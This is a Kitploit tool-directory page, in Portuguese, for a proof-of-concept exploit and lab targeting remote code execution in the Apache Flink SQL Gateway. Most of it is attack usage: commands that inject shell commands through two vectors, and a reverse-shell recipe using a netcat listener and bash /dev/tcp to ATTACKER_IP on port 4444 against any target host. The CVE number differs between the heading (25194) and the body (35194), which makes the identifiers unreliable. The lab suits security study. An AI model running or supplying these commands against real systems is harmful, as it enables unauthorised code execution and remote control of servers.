Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-25194 — Exploit de prova de conceito e ambiente de laboratório para CVE-2026-25194 | Kitploit
Ferramentas/GitHubGitHub/dexsemon/cve-2026-25194
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

Exploit de prova de conceito e ambiente de laboratório para CVE-2026-25194

Ver Repositório
3há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-35194 — Injeção de Código SQL no Apache Flink

Execução remota de código nos TaskManagers do Apache Flink via injeção na geração de código SQL.

CVECVE-2026-35194
CVSS8.1 (Alto)
CWECWE-94 — Injeção de Código
AfetadosFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Corrigido1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Superfície de AtaqueAPI REST do SQL Gateway (porta padrão 8083, sem autenticação)

Início Rápido

1. Implante o Laboratório Vulnerável

root@kitploit:~
docker compose up -d

Aguarde ~30s para o cluster iniciar. Dois serviços surgem:

  • Flink Web UI — http://localhost:8081
  • API REST do SQL Gateway — http://localhost:8083

Verifique:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. Instale Dependências

root@kitploit:~
pip install requests

3. Explorar

Vetor JSON:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

Vetor LIKE:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Apenas verificação de versão (sem RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

Verifique RCE no TaskManager:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Reverse Shell

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Uso

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Aviso Legal

Apenas para fins autorizados de pesquisa de segurança e educação.

Baixar ferramenta